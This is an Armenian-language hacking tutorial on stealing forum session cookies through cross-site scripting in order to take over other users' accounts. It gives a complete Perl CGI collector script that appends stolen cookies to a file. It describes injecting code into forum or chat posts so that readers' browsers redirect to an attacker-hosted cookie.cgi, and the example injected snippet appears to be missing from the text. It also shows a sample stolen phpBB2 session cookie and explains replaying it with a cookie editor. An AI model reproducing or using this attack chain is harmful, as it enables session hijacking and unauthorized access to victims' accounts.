Cross-site scripting (CSS/XSS)-ը հզոր գործիք է, որի միջոցով կարելի է անօրինական մուտք ստանալ ցանցային տարբեր ռեսուրսների նկատմամաբ` օտար էլ. արկղեր, ֆորումներ, չատեր և այլն:
Որպեսզի օգտագործողը ամեն անգամ չհավաքի ծածկագիրը, երբ նա ֆորում է մտնում, ֆորումի ստեղծողները մտածել են հեղինակության հաստատման միջոց` օգտագործելով cookie –ները: Այսինքն` օգտագործողի ծածկանունից և ծածկագրից ստեղծվում է տեքստային փաստաթուղթ, որը տեղադրվում է C:\...\...\Cookies հասցեում: Երբ օգտագործողը միանում է ֆորումին, սկրիպտը ստուգում է տվյալ ֆայլի առկայյությունը նրա համակարգչում: Եթե ֆայլը կա, ապա օգտագործողը համարվում է ֆորումի օրինական օգտագործող:
եթե դու կարողանաս գողանալ այդ ֆայլի տվյալները և ուղարկես սերվեր, ապա նրանք քեզ կընդունեն որպես իրենց օրինական օգտագործողի: JavaScript –ը ունի այդպիսի հնարավորություն:
Cooki-ների գողացման գործընթացը.
Առաջին հերթին պետք է ստեղծվի cgi սկրիպտ, որը կընդունի տվյալները cooki – ներից և այն կհիշի մի նոր ֆայլում: Այսպիսին է այդ սկրիպտի տեսքը պերլում:
#!/usr/bin/perl -w # բացում ենք cookies.txt –ը ինֆորմացիայի ավելացման համար open COOKIES,">>../cookies.txt"; print "Content-Type: text/html\n\n"; # ֆայլի մեջ ավելացնում ենք մի կետ, որի օգնությամբ # կարող ենք տեսնել, թե որտեղից են սկսվում գողացված տվյալները print COOKIES "----------- new cookie -----------\n"; print COOKIES "$ENV{'QUERY_STRING'}\n"; # ավելացնում ենք կետ, որտեղ պետք է վերջանան գողացված տվյալները print COOKIES "---------- end of cookie ---------\n\n"; # Փակում ենք cookies.txt – ֆայլը close COOKIES;
Այս կոդը պետք է հիշվի cookie.cgi ֆայլում: Առաջին քայլը կատարված է: Հիմա մենք ունենք սկրիպտը: Նրան կփոխանցվեն տվյալներ cookie –ից, որն էլ իր հերթին այդ տվյալները կավելացնի cookies.txt ֆայլում: Արդյունքում այս ֆայլում կկրկնօրինակվեն այն բոլոր օգտագործողների cookie-ները, որոնք կնայեն ֆորումը կամ կկարդան չատում այն հաղորդագրությունը, որը պարունակում է այդ սկրիպտը աշխատեցնող ինչ-որ կոդ: Այդ կոդի օրինակ է հանդիսանում
կոդը: Այս սկրիպտի իրականացման ընթացքում բրոուզերը redirect կկատարի http://something/cgi-bin/cookie.cgi հասցեում գտնվող սկրիպտը:
Ֆորումից գողացված տեղեկությունները ունեն հետևյալ տեսքը. b=b;%20hotlog=1;%20phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A3%3A%22471%22%3B%7D;%20phpbb2mysql_sid=a5cadcb43f68a1dcd64b9324f4e7162f;%20phpbb2mysql_t=a%3A3%3A%7Bi%3A742%3Bi%3A1075844973%3Bi%3A744%3Bi%3A1075845106%3Bi%3A745%3Bi%3A1075845231%3B%7D Այս տվյալները մշակելու համար պետք է օգտագործել Cookie Editor ծրագիրը, որը վերցնելով այս տվյալները` կստեղծի cookie, որն էլ օգտագործելով հնարավոր կլինի մուտք գործել տվյալ ֆորումները և այլ տեղեր:
